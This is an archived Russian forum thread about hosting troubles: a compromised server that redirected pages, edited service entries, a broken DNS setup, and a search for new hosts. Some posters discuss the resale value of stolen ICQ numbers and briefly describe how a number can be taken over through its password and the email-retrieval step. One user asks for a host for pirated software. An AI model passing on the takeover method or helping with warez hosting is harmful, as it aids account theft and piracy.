qotd 17/udp quote #Quote of the day
chargen 19/tcp ttytst source #Character generator
chargen 19/udp ttytst source #Character generator
Вот это он прописал, скорее всего:
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/tcp users #Active users
Вообщем, давно я на такую измену не садился. =)
Цитата:
Hello,
Some bad users were running the scripts under auhority of
nobody user that was causing the server to redirect the pages to
another domain. Now the issue is resolved If you have more doubts then
please let us know.
Regards,
что и предпологалось. проблемма решена,
спасибо за помошь, друзья.
Donatello
Цитата:
80-100
помнится в далеком, далеком прошлом, когда мне каким то образом попадали аси, то я проверял только первые три, на остольные у меня ограничитель - лень стоял. так что думаю не стоит парится.
Sky hawk
а что же DNS не исправили?
http://dnsreport.com/tools/dnsreport.ch?domain=sky-team.ru
домен хоть и резольвится, но это не правильно, и могут быть проблемы.
Donatello
думаю им твои аськи не нужны.
кстати, пароль от аськи ничего не дает, разве нет?
без праймари мыла я имею ввиду, его ведь поменять нельзя.
а что же DNS не исправили?
http://dnsreport.com/tools/dnsreport.ch?domain=sky-team.ru
домен хоть и резольвится, но это не правильно, и могут быть проблемы.
Donatello
думаю им твои аськи не нужны.
кстати, пароль от аськи ничего не дает, разве нет?
без праймари мыла я имею ввиду, его ведь поменять нельзя.
batva
ждут Билла, сами по ходу не могут.. подождем.. =)))
p.s. главного тех. админа и одного из трех кто сооброжает William Lu =)
ждут Билла, сами по ходу не могут.. подождем.. =)))
p.s. главного тех. админа и одного из трех кто сооброжает William Lu =)
batva
Ну это тема не для таких разговоров, не потому что я не хочу говорить, просто это не совсем удобно здесь обсуждать. Конечно если это очень серьёзные люди, даже очень-очень, которые кроме e-gold ничего не признают, то да наверное. Хотя, ведь аськи могут стоить 0.1$ - 600/800 $ =)
Цитата:
Ну у меня же не все номера с прописанным e-mail. А потом, они же получили бы всё на блюдечке пароль + e-mail, на те номера которые находились в реестре. =) Да и есть такие номера, как невидимки, их просто не портят в последнее время и не прописывают ничего, поэтому у номера достаточно забрать только пароль. А от старого примари можно сейчас отвязать номер, если сделать ретрив на примари и задать вопросы-ответы.
Ну это тема не для таких разговоров, не потому что я не хочу говорить, просто это не совсем удобно здесь обсуждать.
Конечно если это очень серьёзные люди, даже очень-очень, которые кроме e-gold ничего не признают, то да наверное. Хотя, ведь аськи могут стоить 0.1$ - 600/800 $ =) Цитата:
кстати, пароль от аськи ничего не дает, разве нет?
без праймари мыла я имею ввиду, его ведь поменять нельзя.
Ну у меня же не все номера с прописанным e-mail. А потом, они же получили бы всё на блюдечке пароль + e-mail, на те номера которые находились в реестре. =) Да и есть такие номера, как невидимки, их просто не портят в последнее время и не прописывают ничего, поэтому у номера достаточно забрать только пароль. А от старого примари можно сейчас отвязать номер, если сделать ретрив на примари и задать вопросы-ответы.
Donatello
Цитата:
серьезно?
Вау, дак это же клондайк тогда в твоем компьютере для них.
Цитата:
Хотя, ведь аськи могут стоить 0.1$ - 600/800 $ =)
серьезно?
Вау, дак это же клондайк тогда в твоем компьютере для них.
batva
Я тебе в ПМ напиши... Просвещу уж Crazy administrator'а, раз такое дело. =)
Я тебе в ПМ напиши... Просвещу уж Crazy administrator'а, раз такое дело. =)Гы=) незнаю что движет мною выпитый алкоголльб млм желание высказатмя но видимо я дастал дастал "газина" и они удалили всё, все более 3 гекар софта и заблочив мой акк sky-team.ru лишь бы я от них ушел.. а жаль как удобно держать файловый архив сайта на плтном хосте.. теперь видимо придется использовать рапиду и прочию чушь для заливки...
данный пост создан исключитеьно для эпилога двух последних страниц флейма. =))))
p.s. я знаю что подобная тема уже создана в "Хостинге" но.. кто нибудь знает быстого прова который хостит варез, именно софт, а не гл. страничку??
данный пост создан исключитеьно для эпилога двух последних страниц флейма. =))))
p.s. я знаю что подобная тема уже создана в "Хостинге" но.. кто нибудь знает быстого прова который хостит варез, именно софт, а не гл. страничку??
Заведите мыло на nm.ru/hotbox - и будет вам бесплатный хостинг :-D
Народ! Наткнулся тут на такой хостинг! http://www.webhost.com.ua/ такой чувство что его тое надобно добавить в черный список! Мож кто слышал про подобное!
Пиплы, такой вопрос. Как я могу узнать, насколько быстрые сервера у того или иного хостера по отношению к или России, или Заграницы? На данный момент интересует eserver.ru.
Страницы: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051
Предыдущая тема: Обновления в правилах форума
Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.